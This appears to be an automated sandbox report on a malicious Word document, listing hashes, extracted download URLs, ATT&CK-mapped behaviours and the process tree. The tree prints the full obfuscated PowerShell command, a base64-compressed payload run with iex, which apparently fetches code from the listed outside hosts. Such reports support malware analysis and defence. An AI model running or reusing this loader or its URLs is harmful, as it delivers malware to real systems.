Analysis
-
max time kernel
101s -
max time network
36s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 06:07
Behavioral task
behavioral1
Sample
ecfccd52eac33bcfcf7fb7d5917b1f60_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ecfccd52eac33bcfcf7fb7d5917b1f60_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ecfccd52eac33bcfcf7fb7d5917b1f60_JaffaCakes118.doc
-
Size
131KB
-
MD5
ecfccd52eac33bcfcf7fb7d5917b1f60
-
SHA1
fb334a3a9a26cb9e51fabab8b700a4e97610b0f0
-
SHA256
2de89c748bd946f69be57df43e160b01b66833a43c88c37bd7b2aa67d2af5ff1
-
SHA512
efcb452d50e7d0c6e5b9ff5660493ec578cea2d4195f4008161a4a87415a157cd393b7acfa4f5ba7f5f08606ed2825b24f97bc5969b8dcf05781965ceebc8d9c
-
SSDEEP
1536:NZ0rgMc0qg4Kkd8j6IjM+ahy0H/ovL+b4GJog6unhEXPx04IsCs:Yrgzg4KkjoT2wvLuJyuMx0DsT
Malware Config
Extracted
http://mnapoli.org/iq2V1CQ/
http://redfern.it/mfa6Sg3/
http://hitech-control.com/KYGsjZ/
http://podpea.co.uk/2DLIE6/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 3024 2532 Powershell.exe 29 -
Blocklisted process makes network request 6 IoCs
flow pid Process 6 3024 Powershell.exe 7 3024 Powershell.exe 8 3024 Powershell.exe 10 3024 Powershell.exe 12 3024 Powershell.exe 14 3024 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3024 Powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2532 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3024 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3024 Powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2532 WINWORD.EXE 2532 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2532 wrote to memory of 2228 2532 WINWORD.EXE 30 PID 2532 wrote to memory of 2228 2532 WINWORD.EXE 30 PID 2532 wrote to memory of 2228 2532 WINWORD.EXE 30 PID 2532 wrote to memory of 2228 2532 WINWORD.EXE 30 PID 2532 wrote to memory of 3024 2532 WINWORD.EXE 31 PID 2532 wrote to memory of 3024 2532 WINWORD.EXE 31 PID 2532 wrote to memory of 3024 2532 WINWORD.EXE 31 PID 2532 wrote to memory of 3024 2532 WINWORD.EXE 31
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecfccd52eac33bcfcf7fb7d5917b1f60_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell -WinDowsTyle hidden ( NeW-ObJECt Io.StreamReaDEr( (NeW-ObJECt SySTEm.Io.cOmPRessIon.DeFLATEstReAm( [SysteM.Io.MeMoRystrEAM][CoNVeRt]::FROMBasE64sTriNG('bVZtb9pIEP5+0v0HqzoFIxLj9bsTVWohtHWvxzUhvSZFfHCICSTBdo2btKH893tmd8dw9BRtmJ3dnZ2deeYZm+aLtfA3a9fZrEP8QBSbtQ3JxQg263izdjD1MfWwgnXHg4jhQh1hO076GA6GSzswsOrQASw7OOHRKaziAo/sYbgYHrYI/AraTqewLmjgWo8Gzni4RJBV+sVwoHfILO2j28lN/LqwgSV38+JoZrQCtVG0Dls4jaWQriI7woGuvD9Myvu0LB4WFqYfR/Pir2zs2pMO1JcYbWhfGne9RO3sGFq4mWWVFs9OtXDc7WI3+Sz8SAZIUIQC9WZBToa0SK8RNiTfI8HdfI3vjmZkVBtKXp/2L9t6krPgdl9pyZoWy+6fV3p2msOFvIORHSV1prXzulnu/KqiZ5mQ8DCtu65otW1Vg/Ih7Q9o8X3vghbHo7paDN9OxtN36fkkDrZ7TKWKREcJQaQFIez23jk3/o9tP139j22nbWRfzo0DwzTgT7l6VywHY0dMOphRBn1fYYPwF1EibV8hNaYJISn0NCIITY6ElMSGq4BGWBSEYkEwIpCGtkKlINwHGDElhTSho4sBBiJbA1L+s2EpINs2DARkn6AvyDshYSpnVA20SQLClqUkqHgYrORYCHMhgdEPVCkRogmm0QbvVbk60hn6pwHESYPHfJXepCvGzXVfC6awtcSQaUBqvDQsE1jRU4ZLMgi6WpwVWhj9WPHppCRkq2IUVK0UvlgVnCC/Q4l2LMSBIgAhX0IvJ86gqMm0EJGEsWIRIcvc9lR57jmUQXXMzzlj4Bbv+eFbz9Qc20lQhrqLr1ofXxQ7O9sNBrGPQifXqBZM1CCyoMlM5o6c92QCocGemzcJKuKBHbz6xJ6m7N0HJWwfs9logZKJvzQY3WrNHefsgU/v/eaZruqnJncJvRKBDiSUELzIV5xMfEZUE8sQSwT6mkklyRkNbxmLnMVeMuKrrIYKQQ1Go+Vrr64+Wc9DPXvLoFgttDC1nnG+Us880cpFelsV30pJVZzG9iHb7tYVR637aq4l0T+DgV7yehtA63NG6WnSvbq9eWLG2nLXvK7V5Toh38+aRADFdYW0LTCGt89SN2tqoqHGQ8NhwOhfhs2QFQfmXubqbGkN93RJ/sgHp0VeV4Xyi7eVWYqZLAbZgWRbiKnUZZcD6IhrYgm3ievtohUbUTJBoHpxQMmOVBONqOnJnidsSRtUn4FEr6y/UPVbQbUaE7CxMyKKIQDRDqJBSZCe6sgRmaKJoO+BWPZbIkdXNeKISFIyJkERRmIqEh8XFxWj+zu3GsaIzIgsNN0hHEf3ipCbhh/u9Qxd0vfJ6LQvUcCsd83hbmqlgbSOfX22A2RDNvAsf4QNigTVBsS6TJq+zRAsv3FR5/UyY16NGMB8L6zXzDxZ3SjZm6ej4voum+7gazbVwlL/9ttcKEzv8Q5mpStMDDOomtb/PIxNPCZdQcn3PSxUkTQPcsRu1CVUp/zC35KGkfbrfF1XP9ZNa+lfGi85iVODuxGHFG/7Xcuui4akzKXMDT3KWfvkehvhJefI5tbUu/jMKr6nNpsgrnADaAvuDEfsEib80aOoC7dyhMtjppn7Ltcyf6GBRlmTpdO5uWWO1Y2VM6FzvP+mGgVvWYwF8oACcF8sOWlwzmcC+wIGq2vc3y0LRgx7kNcn+1it0px31U3GFnWXkYHPuLPtLZ1tqwaMD6hz8zx/0B9o9OaTzTStp/M1hYRaM9V1C+3ufFB+SKcDsyW/oMar+jzJUV79eVpN3GBnHd9dOPqztaOSKNk7Eu+so2X+su61jZ8WPt/+GAwfj/vFcvRx0B97h8I/dPzJ0V2xyFut9r8=') , [Io.coMpREssIOn.comPREssiOnModE]::DeCOmPReSS)),[SYsTEM.TEXT.enCOdiNg]::aSCii)).ReADtoEnd( )|iEx2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD506b2319a098364936f096557a29dd509
SHA18ea0948b7e1dbd92c614328faa405fbeb9686f2f
SHA25613f9401477a34a8dfbf04a330488dedd4591fb9fd29cb2d6181c2cb4af3d7eb7
SHA51299774738f7bd91e9a04fdeb1aa28dacb356ab0da2e1dde0ea75e2425a1c39580fde293bec5c792ab592ab26c69643b35c468143adf7b869b1a97fa223d32c8ce